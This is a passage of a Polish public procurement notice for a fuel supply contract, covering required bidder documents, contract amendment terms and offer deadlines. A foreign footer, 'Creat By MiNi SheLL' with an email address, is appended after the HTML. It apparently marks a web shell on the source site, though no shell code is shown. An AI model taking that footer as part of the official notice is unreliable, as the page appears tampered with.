109 ust. 1 pkt 4 ustawy <br/>Pzp., sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli <br/>odrębne przepisy wymagają wpisu do rejestru lubewidencji;<br/>Zamawiający żąda od wykonawcy, który polega na zdolnościach technicznych lub zawodowych lub <br/>sytuacji finansowej lub ekonomicznej podmiotów udostępniających zasoby na zasadach określonych <br/>w art. 118 ustawy Pzp., przedstawienia podmiotowych środków dowodowych, o których <br/>mowa w pkt 2 ppkt 1 lit. b dotyczących tych podmiotów, potwierdzających, że nie <br/>zachodzą wobec tych podmiotów podstawy wykluczenia z postępowania.<br/>Zamawiający nie żąda od wykonawcy przedstawienia podmiotowych środków dowodowych, <br/>dotyczących podwykonawców niebędących podmiotami udostępniającymi zasoby na zasadach <br/>określonych w art. 118 ustawy Pzp., potwierdzających, że nie zachodzą wobec tych podwykonawców <br/>podstawy wykluczenia z postępowania.<br/>2) Podmiotowe środki dowodowe dotyczące wykonawców mających siedzibę lub miejsce <br/>zamieszkania poza granicami Rzeczpospolitej Polskiej.<br/>a) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami <br/>Rzeczypospolitej Polskiej, zamiast:<br/>− odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej <br/>Ewidencji i Informacji o Działalności Gospodarczej, o których mowa w <br/>pkt 2 ppkt 1 lit. b składa dokument lub dokumenty wystawione w <br/>kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, <br/>potwierdzające odpowiednio, że:<br/>-- nie otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie <br/>zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego <br/>działalność gospodarcza nie jest zawieszona ani nie znajduje się on w <br/>innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej <br/>w przepisach miejsca wszczęcia tej procedury.<br/>b) Dokument, o którym mowa w pkt 2 ppkt 2 lit. a) myślnik pierwszy powinien być <br/>wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>c) Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie <br/>wydaje się dokumentów, o których mowa w pkt 2 ppkt 2, zastępuje się je <br/>odpowiednio w całości lub w części dokumentem zawierającym odpowiednio <br/>oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego <br/>reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone <br/>pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub <br/>miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, <br/>złożone przed organem sądowym lub administracyjnym, notariuszem, organem <br/>samorządu zawodowego lub gospodarczego, właściwym ze względu na siedzibę <br/>lub miejsce zamieszkania wykonawcy. Pkt 2 ppkt 2 lit. b stosuje się.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający żąda od wykonawcy, którego oferta została najwyżej oceniona następujące <br/>podmiotowe środki dowodowe w celu potwierdzenia spełniania warunków udziału w<br/>postępowaniu.<br/>a) W celu potwierdzenia spełniania przez wykonawcę warunków udziału w <br/>postępowaniu dotyczących uprawnień do prowadzenia określonej działalności <br/>gospodarczej lub zawodowej, zamawiający żąda następujące podmiotowe środki<br/>dowodowe:<br/>- aktualną koncesją na prowadzenie działalności w zakresie objętym zamówieniem, czyli obrotem paliwami ciekłymi udzieloną na podstawie ustawy z <br/>dnia 10.04.1997 r. - Prawo energetyczne (Dz. U. z 2019 r., poz. 755 ze zm.)</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Możliwość zastąpienia podmiotowych środków dowodowych odpowiednim zaświadczeniem o wpisie do urzędowego<br/>wykazu zatwierdzonych wykonawców lub certyfikatem wydanym przez jednostkę certyfikującą<br/>1) zgodnie z ust. 1 par. 12;<br/>2) zgodnie z ust. 3 par. 12<br/>- rozporządzenia MRPiT z dnia 23.12.2020r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy.<br/>2. Inne dokumenty lub oświadczenia składane wraz z ofertą.<br/>1) Oferta, - na ofertę składa się:<br/>a) formularz ofertowy załącznik nr 1 do SWZ udostępniony na Platformie e-Zamówienia zamieszczony w podglądzie<br/>postępowania w zakładce „Informacje podstawowe”;<br/>2) Pełnomocnictwo/a jeśli czynności zostały dokonane przez pełnomocnika;<br/>3) Dokument potwierdzający wniesienie wadium zgodnie z postanowieniami działu XI SWZ;<br/>4) Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby, składa wraz z ofertą zobowiązanie<br/>podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia - wzór zobowiązania stanowi załącznik nr 10 do SWZ lub inny podmiotowy środek dowodowy potwierdzający,<br/>że wykonawca realizując zamówienie będzie dysponował niezbędnymi zasobami tych podmiotów;<br/>5) Oświadczenie o którym mowa w art. 117 ust. 4 ustawy Pzp. w przypadku wykonawców wspólne ubiegających się o<br/>udzielenie zamówienia zgodnie z postanowieniami działu XIII SWZ.<br/>3. Inne dokumenty lub oświadczenia, których może żądać zamawiający:<br/>1) W sytuacji, gdy wykonawca nie złożył wymaganych pełnomocnictw albo złożył pełnomocnictwa wadliwe Zamawiający<br/>może na podstawie art. 128 ust. 1 ustawy Pzp. wezwać do ich złożenia, poprawienia lub uzupełnienia w wyznaczonym<br/>terminie. Pełnomocnictwo wymagane jest w szczególności w przypadku osoby działającej w imieniu wykonawcy, działającej<br/>w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, działającej w imieniu podmiotu<br/>udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp. lub działającej w imieniu podwykonawcy<br/>niebędącego podmiotem udostępniającym zasoby.<br/>Co do zasady pełnomocnictwo/a składa się wraz z ofertą lub z pierwszym oświadczeniem lub dokumentem, do którego<br/>pełnomocnictwo jest wymagane. Forma pełnomocnictw: Zgodnie z art. 99 § 1 Kodeksu cywilnego jeżeli do ważności<br/>czynności prawnej potrzebna jest szczególna forma, pełnomocnictwo do dokonania tej czynności powinno być udzielone w<br/>tej samej formie. Pełnomocnictwo sporządza się w formie elektronicznej (postać elektroniczna opatrzona kwalifikowanym<br/>podpisem elektronicznym) lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. W<br/>przypadku, gdy pełnomocnictwo zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym<br/>podpisem przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub podpisem osobistym. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci<br/>papierowej dokonuje mocodawca.<br/>Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej może dokonać również notariusz.<br/>Stosownie do art. 97 § 2 ustawy z dnia 14 lutego 1991 roku - Prawo o notariacie elektroniczne poświadczenie zgodności z<br/>okazanym dokumentem notariusz opatruje kwalifikowanym podpisem elektronicznym.<br/>2) zamawiający może żądać pełnomocnictwa lub innych dokumentów w przypadku ustanowienia pełnomocnika zgodnie z<br/>par. 13 rozporządzenia MRPiT z dnia 23.12.2020r. w sprawie podmiotowych środków dowodowych oraz innych<br/>dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 4. Zamawiający przewiduje możliwość zmian postanowień zawartej umowy na podstawie art. 455 <br/>ustawy Pzp. oraz w przypadku wystąpienia, co najmniej jednej z okoliczności wymienionych w <br/>par. 8 wzoru umowy.<br/>5. Postanowienia, które stanowią katalog zmian, na które zamawiający może wyrazić zgodę nie <br/>stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.<br/>6. Zmiana umowy może nastąpić na pisemny umotywowany wniosek jednej ze stron, za <br/>zgodą drugiej strony umowy, na podstawie aneksu do umowy.<br/>7. Wszelkie zmiany niniejszej umowy wymagają dla swej ważności formy pisemnej pod <br/>rygorem nieważności.<br/>8. Istotna zmiana zawartej umowy wymaga przeprowadzenia nowego postępowania o <br/>udzielenie zamówienia publicznego. Istotność zmiany umowy zamawiający będzie rozpatrywał <br/>biorąc pod uwagę art. 454 ust. 2 ustawy Pzp <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-12-07 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma e-Zamówienia</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-12-07 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-01-05</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com